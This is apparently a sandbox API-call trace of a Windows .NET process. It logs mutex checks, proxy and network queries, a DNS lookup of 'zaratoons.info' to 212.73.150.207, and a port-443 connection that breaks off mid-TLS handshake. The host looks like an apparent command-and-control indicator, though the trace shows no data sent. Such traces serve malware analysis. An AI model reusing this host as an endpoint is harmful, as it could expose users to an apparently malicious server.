	[0725.538] RegCloseKey (hKey=0x3d8) returned 0x0
	[0727.286] GetVersionExW (in: lpVersionInformation=0x1c86c7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c86c7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0727.287] GetVersionExW (in: lpVersionInformation=0x1c86c790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c86c790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0727.288] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f28fc0, cbSid=0x1c86d7d0 | out: pSid=0x2f28fc0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d7d0) returned 1
	[0729.087] CreateMutexW (lpMutexAttributes=0x2f291c8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0729.088] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0729.092] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x102
	[0733.104] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0733.106] GetCurrentProcessId () returned 0xf6c
	[0733.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3e4
	[0733.107] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c86d6e0, lpExitTime=0x1c86d6d8, lpKernelTime=0x1c86d6d0, lpUserTime=0x1c86d6c8 | out: lpCreationTime=0x1c86d6e0, lpExitTime=0x1c86d6d8, lpKernelTime=0x1c86d6d0, lpUserTime=0x1c86d6c8) returned 1
	[0733.108] CloseHandle (hObject=0x3e4) returned 1
	[0733.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x3e4
	[0733.108] GetProcessTimes (in: hProcess=0x3e4, lpCreationTime=0x1c86d770, lpExitTime=0x1c86d768, lpKernelTime=0x1c86d760, lpUserTime=0x1c86d758 | out: lpCreationTime=0x1c86d770, lpExitTime=0x1c86d768, lpKernelTime=0x1c86d760, lpUserTime=0x1c86d758) returned 1
	[0733.108] CloseHandle (hObject=0x3e4) returned 1
	[0733.108] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x3e4
	[0733.109] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.109] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.110] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86d6c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86d6c8*=0x3e8) returned 1
	[0733.112] CloseHandle (hObject=0x3e8) returned 1
	[0733.112] CloseHandle (hObject=0x3e4) returned 1
	[0733.114] ReleaseMutex (hMutex=0x3d8) returned 1
	[0733.114] CloseHandle (hObject=0x3d8) returned 1
	[0734.601] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2a088, cbSid=0x1c86d7d0 | out: pSid=0x2f2a088*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d7d0) returned 1
	[0734.602] CreateMutexW (lpMutexAttributes=0x2f2a240, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.602] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.603] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.603] CloseHandle (hObject=0x3d8) returned 1
	[0734.603] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2aeb0, cbSid=0x1c86d7d0 | out: pSid=0x2f2aeb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d7d0) returned 1
	[0734.603] CreateMutexW (lpMutexAttributes=0x2f2b068, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.603] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.604] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.604] CloseHandle (hObject=0x3d8) returned 1
	[0734.604] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2bce8, cbSid=0x1c86d7d0 | out: pSid=0x2f2bce8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d7d0) returned 1
	[0734.604] CreateMutexW (lpMutexAttributes=0x2f2bea0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.605] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.605] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.606] CloseHandle (hObject=0x3d8) returned 1
	[0734.606] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2cb18, cbSid=0x1c86d7d0 | out: pSid=0x2f2cb18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d7d0) returned 1
	[0734.606] CreateMutexW (lpMutexAttributes=0x2f2ccd0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.606] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.607] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.607] CloseHandle (hObject=0x3d8) returned 1
	[0734.609] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2d948, cbSid=0x1c86d780 | out: pSid=0x2f2d948*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d780) returned 1
	[0734.609] CreateMutexW (lpMutexAttributes=0x2f2db00, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.609] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.610] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.610] CloseHandle (hObject=0x3d8) returned 1
	[0734.610] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2e768, cbSid=0x1c86d780 | out: pSid=0x2f2e768*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d780) returned 1
	[0734.611] CreateMutexW (lpMutexAttributes=0x2f2e920, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.611] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.612] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.612] CloseHandle (hObject=0x3d8) returned 1
	[0734.612] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f2f580, cbSid=0x1c86d780 | out: pSid=0x2f2f580*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d780) returned 1
	[0734.612] CreateMutexW (lpMutexAttributes=0x2f2f738, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.612] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.613] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.613] CloseHandle (hObject=0x3d8) returned 1
	[0734.613] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f303a8, cbSid=0x1c86d780 | out: pSid=0x2f303a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d780) returned 1
	[0734.613] CreateMutexW (lpMutexAttributes=0x2f30560, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.614] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.614] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.614] CloseHandle (hObject=0x3d8) returned 1
	[0734.615] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f311c8, cbSid=0x1c86d780 | out: pSid=0x2f311c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c86d780) returned 1
	[0734.615] CreateMutexW (lpMutexAttributes=0x2f31380, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d8
	[0734.615] WaitForSingleObject (hHandle=0x3d8, dwMilliseconds=0x1f4) returned 0x0
	[0734.616] ReleaseMutex (hMutex=0x3d8) returned 1
	[0734.616] CloseHandle (hObject=0x3d8) returned 1
	[0737.618] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d8
	[0737.619] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4
	[0737.619] ioctlsocket (in: s=0x3d8, cmd=-2147195266, argp=0x1c86ddb8 | out: argp=0x1c86ddb8) returned 0
	[0737.620] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e8
	[0737.620] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ec
	[0737.620] ioctlsocket (in: s=0x3e8, cmd=-2147195266, argp=0x1c86ddb8 | out: argp=0x1c86ddb8) returned 0
	[0737.621] WSAIoctl (in: s=0x3d8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86dd30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86dd30, lpOverlapped=0x0) returned -1
	[0737.622] CoTaskMemAlloc (cb=0x204) returned 0x208520
	[0737.622] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x208520, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.092] CoTaskMemFree (pv=0x208520) 
	[0739.092] WSAEventSelect (s=0x3d8, hEventObject=0x3e4, lNetworkEvents=512) returned 0
	[0739.093] WSAIoctl (in: s=0x3e8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86dd30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86dd30, lpOverlapped=0x0) returned -1
	[0739.093] CoTaskMemAlloc (cb=0x204) returned 0x208520
	[0739.093] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x208520, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.093] CoTaskMemFree (pv=0x208520) 
	[0739.093] WSAEventSelect (s=0x3e8, hEventObject=0x3ec, lNetworkEvents=512) returned 0
	[0739.093] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0
	[0739.094] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x3f0, param_3=0x3) returned 0x0
	[0739.099] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c86de70 | out: phkResult=0x1c86de70*=0x40c) returned 0x0
	[0739.102] RegOpenKeyExW (in: hKey=0x40c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86dd58 | out: phkResult=0x1c86dd58*=0x410) returned 0x0
	[0739.102] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414
	[0739.103] RegNotifyChangeKeyValue (hKey=0x410, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x414, fAsynchronous=1) returned 0x0
	[0739.104] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86dd80 | out: phkResult=0x1c86dd80*=0x418) returned 0x0
	[0739.104] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0739.104] RegNotifyChangeKeyValue (hKey=0x418, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x41c, fAsynchronous=1) returned 0x0
	[0739.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c86dd80 | out: phkResult=0x1c86dd80*=0x420) returned 0x0
	[0739.105] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0739.105] RegNotifyChangeKeyValue (hKey=0x420, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x424, fAsynchronous=1) returned 0x0
	[0739.105] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.105] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86dce8 | out: TokenHandle=0x1c86dce8*=0x428) returned 1
	[0739.113] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.113] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d4b8 | out: TokenHandle=0x1c86d4b8*=0x42c) returned 1
	[0739.118] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.118] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d4b8 | out: TokenHandle=0x1c86d4b8*=0x430) returned 1
	[0747.601] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c86ddb8 | out: pProxyConfig=0x1c86ddb8) returned 1
	[0750.857] SetEvent (hEvent=0x370) returned 1
	[0756.439] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.440] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d528 | out: TokenHandle=0x1c86d528*=0x490) returned 1
	[0756.443] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.443] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d528 | out: TokenHandle=0x1c86d528*=0x494) returned 1
	[0757.871] SetEvent (hEvent=0x370) returned 1
	[0765.130] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c86d9f8 | out: pFixedInfo=0x0, pOutBufLen=0x1c86d9f8) returned 0x6f
	[0772.014] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b85cf20
	[0772.014] GetNetworkParams (in: pFixedInfo=0x1b85cf20, pOutBufLen=0x1c86d9f8 | out: pFixedInfo=0x1b85cf20, pOutBufLen=0x1c86d9f8) returned 0x0
	[0779.622] CoTaskMemAlloc (cb=0xd) returned 0x1b821d50
	[0779.623] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0779.623] CoTaskMemFree (pv=0x1b821d50) 
	[0779.626] LocalFree (hMem=0x1b85cf20) returned 0x0
	[0779.640] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a4
	[0779.641] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3dc
	[0779.643] CoTaskMemAlloc (cb=0x10) returned 0x1b821d50
	[0779.645] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c86d9a0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c86d998 | out: ppResult=0x1c86d998*=0x1b84d6f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b8222d0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0784.266] CoTaskMemFree (pv=0x1b821d50) 
	[0784.266] CoTaskMemFree (pv=0x0) 
	[0784.267] FreeAddrInfoW (pAddrInfo=0x1b84d6f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b8222d0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0784.269] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b4
	[0784.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x494
	[0784.269] ioctlsocket (in: s=0x4b4, cmd=-2147195266, argp=0x1c86d9b8 | out: argp=0x1c86d9b8) returned 0
	[0784.269] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d0
	[0784.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d4
	[0784.269] ioctlsocket (in: s=0x3d0, cmd=-2147195266, argp=0x1c86d9b8 | out: argp=0x1c86d9b8) returned 0
	[0784.270] WSAIoctl (in: s=0x4b4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86d930, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86d930, lpOverlapped=0x0) returned -1
	[0784.270] CoTaskMemAlloc (cb=0x204) returned 0x208b50
	[0784.270] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x208b50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.270] CoTaskMemFree (pv=0x208b50) 
	[0784.270] WSAEventSelect (s=0x4b4, hEventObject=0x494, lNetworkEvents=512) returned 0
	[0784.270] WSAIoctl (in: s=0x3d0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86d930, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86d930, lpOverlapped=0x0) returned -1
	[0784.270] CoTaskMemAlloc (cb=0x204) returned 0x208b50
	[0784.270] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x208b50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.270] CoTaskMemFree (pv=0x208b50) 
	[0784.270] WSAEventSelect (s=0x3d0, hEventObject=0x3d4, lNetworkEvents=512) returned 0
	[0784.297] GetAdaptersAddresses () returned 0x6f
	[0785.052] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b8664e0
	[0785.052] GetAdaptersAddresses () returned 0x0
	[0787.143] LocalFree (hMem=0x1b8664e0) returned 0x0
	[0787.146] WSAConnect (in: s=0x4a4, name=0x2f3cd08*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0787.294] closesocket (s=0x3dc) returned 0
	[0788.309] EnumerateSecurityPackagesW (in: pcPackages=0x1c86d818, ppPackageInfo=0x1c86d810 | out: pcPackages=0x1c86d818, ppPackageInfo=0x1c86d810) returned 0x0
	[0788.313] lstrlenW (lpString="Negotiate") returned 9
	[0788.314] CoTaskMemAlloc (cb=0x16) returned 0x1b822290
	[0788.314] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e4ea0, Length=0x14 | out: Destination=0x1b822290) 
	[0788.314] CoTaskMemFree (pv=0x1b822290) 
	[0788.315] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0788.315] CoTaskMemAlloc (cb=0x3c) returned 0x1b8568e0
	[0788.315] RtlMoveMemory (in: Destination=0x1b8568e0, Source=0x1e4eb4, Length=0x3a | out: Destination=0x1b8568e0) 
	[0788.315] CoTaskMemFree (pv=0x1b8568e0) 
	[0788.315] lstrlenW (lpString="NegoExtender") returned 12
	[0788.315] CoTaskMemAlloc (cb=0x1c) returned 0x1b852470
	[0788.315] RtlMoveMemory (in: Destination=0x1b852470, Source=0x1e4eee, Length=0x1a | out: Destination=0x1b852470) 
	[0788.315] CoTaskMemFree (pv=0x1b852470) 
	[0788.315] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0788.315] CoTaskMemAlloc (cb=0x3e) returned 0x1b8568e0
	[0788.315] RtlMoveMemory (in: Destination=0x1b8568e0, Source=0x1e4f08, Length=0x3c | out: Destination=0x1b8568e0) 
	[0788.315] CoTaskMemFree (pv=0x1b8568e0) 
	[0788.315] lstrlenW (lpString="Kerberos") returned 8
	[0788.315] CoTaskMemAlloc (cb=0x14) returned 0x1b822290
	[0788.315] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e4f44, Length=0x12 | out: Destination=0x1b822290) 
	[0788.315] CoTaskMemFree (pv=0x1b822290) 
	[0788.316] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0788.316] CoTaskMemAlloc (cb=0x32) returned 0x1b84d430
	[0788.316] RtlMoveMemory (in: Destination=0x1b84d430, Source=0x1e4f56, Length=0x30 | out: Destination=0x1b84d430) 
	[0788.316] CoTaskMemFree (pv=0x1b84d430) 
	[0788.316] lstrlenW (lpString="NTLM") returned 4
	[0788.316] CoTaskMemAlloc (cb=0xc) returned 0x1b822290
	[0788.316] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e4f86, Length=0xa | out: Destination=0x1b822290) 
	[0788.316] CoTaskMemFree (pv=0x1b822290) 
	[0788.316] lstrlenW (lpString="NTLM Security Package") returned 21
	[0788.316] CoTaskMemAlloc (cb=0x2e) returned 0x1b84d430
	[0788.316] RtlMoveMemory (in: Destination=0x1b84d430, Source=0x1e4f90, Length=0x2c | out: Destination=0x1b84d430) 
	[0788.316] CoTaskMemFree (pv=0x1b84d430) 
	[0788.316] lstrlenW (lpString="Schannel") returned 8
	[0788.316] CoTaskMemAlloc (cb=0x14) returned 0x1b822290
	[0788.316] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e4fbc, Length=0x12 | out: Destination=0x1b822290) 
	[0788.316] CoTaskMemFree (pv=0x1b822290) 
	[0788.316] lstrlenW (lpString="Schannel Security Package") returned 25
	[0788.316] CoTaskMemAlloc (cb=0x36) returned 0x1b84d430
	[0788.316] RtlMoveMemory (in: Destination=0x1b84d430, Source=0x1e4fce, Length=0x34 | out: Destination=0x1b84d430) 
	[0788.316] CoTaskMemFree (pv=0x1b84d430) 
	[0788.317] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0788.317] CoTaskMemAlloc (cb=0x5c) returned 0x1b837c40
	[0788.317] RtlMoveMemory (in: Destination=0x1b837c40, Source=0x1e5002, Length=0x5a | out: Destination=0x1b837c40) 
	[0788.317] CoTaskMemFree (pv=0x1b837c40) 
	[0788.317] lstrlenW (lpString="Schannel Security Package") returned 25
	[0788.317] CoTaskMemAlloc (cb=0x36) returned 0x1b84d430
	[0788.317] RtlMoveMemory (in: Destination=0x1b84d430, Source=0x1e505c, Length=0x34 | out: Destination=0x1b84d430) 
	[0788.317] CoTaskMemFree (pv=0x1b84d430) 
	[0788.317] lstrlenW (lpString="WDigest") returned 7
	[0788.317] CoTaskMemAlloc (cb=0x12) returned 0x1b822290
	[0788.317] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e5090, Length=0x10 | out: Destination=0x1b822290) 
	[0788.317] CoTaskMemFree (pv=0x1b822290) 
	[0788.317] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0788.317] CoTaskMemAlloc (cb=0x46) returned 0x1b8568e0
	[0788.317] RtlMoveMemory (in: Destination=0x1b8568e0, Source=0x1e50a0, Length=0x44 | out: Destination=0x1b8568e0) 
	[0788.317] CoTaskMemFree (pv=0x1b8568e0) 
	[0788.317] lstrlenW (lpString="TSSSP") returned 5
	[0788.318] CoTaskMemAlloc (cb=0xe) returned 0x1b822290
	[0788.318] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e50e4, Length=0xc | out: Destination=0x1b822290) 
	[0788.318] CoTaskMemFree (pv=0x1b822290) 
	[0788.318] lstrlenW (lpString="TS Service Security Package") returned 27
	[0788.318] CoTaskMemAlloc (cb=0x3a) returned 0x1b8568e0
	[0788.318] RtlMoveMemory (in: Destination=0x1b8568e0, Source=0x1e50f0, Length=0x38 | out: Destination=0x1b8568e0) 
	[0788.318] CoTaskMemFree (pv=0x1b8568e0) 
	[0788.318] lstrlenW (lpString="pku2u") returned 5
	[0788.318] CoTaskMemAlloc (cb=0xe) returned 0x1b822290
	[0788.318] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e5128, Length=0xc | out: Destination=0x1b822290) 
	[0788.318] CoTaskMemFree (pv=0x1b822290) 
	[0788.318] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0788.318] CoTaskMemAlloc (cb=0x30) returned 0x1b84d430
	[0788.318] RtlMoveMemory (in: Destination=0x1b84d430, Source=0x1e5134, Length=0x2e | out: Destination=0x1b84d430) 
	[0788.318] CoTaskMemFree (pv=0x1b84d430) 
	[0788.318] lstrlenW (lpString="CREDSSP") returned 7
	[0788.318] CoTaskMemAlloc (cb=0x12) returned 0x1b822290
	[0788.318] RtlMoveMemory (in: Destination=0x1b822290, Source=0x1e5162, Length=0x10 | out: Destination=0x1b822290) 
	[0788.319] CoTaskMemFree (pv=0x1b822290) 
	[0788.319] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0788.319] CoTaskMemAlloc (cb=0x4a) returned 0x1b85d550
	[0788.319] RtlMoveMemory (in: Destination=0x1b85d550, Source=0x1e5172, Length=0x48 | out: Destination=0x1b85d550) 
	[0788.319] CoTaskMemFree (pv=0x1b85d550) 
	[0788.319] FreeContextBuffer (in: pvContextBuffer=0x1e4d60 | out: pvContextBuffer=0x1e4d60) returned 0x0
	[0788.327] GetCurrentProcess () returned 0xffffffffffffffff
	[0788.327] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86d2f8 | out: TokenHandle=0x1c86d2f8*=0x3dc) returned 1
	[0788.331] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2f40ec0, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c86d208, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c86d1f8, ptsExpiry=0x1c86d1f0 | out: phCredential=0x1c86d1f8, ptsExpiry=0x1c86d1f0) returned 0x0
	[0789.342] InitializeSecurityContextW (in: phCredential=0x1c86d400, phContext=0x0, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c86d3f0, pOutput=0x2f43608, pfContextAttr=0x1c86d3e8, ptsExpiry=0x1c86d3e0 | out: phNewContext=0x1c86d3f0, pOutput=0x2f43608, pfContextAttr=0x1c86d3e8, ptsExpiry=0x1c86d3e0) returned 0x90312
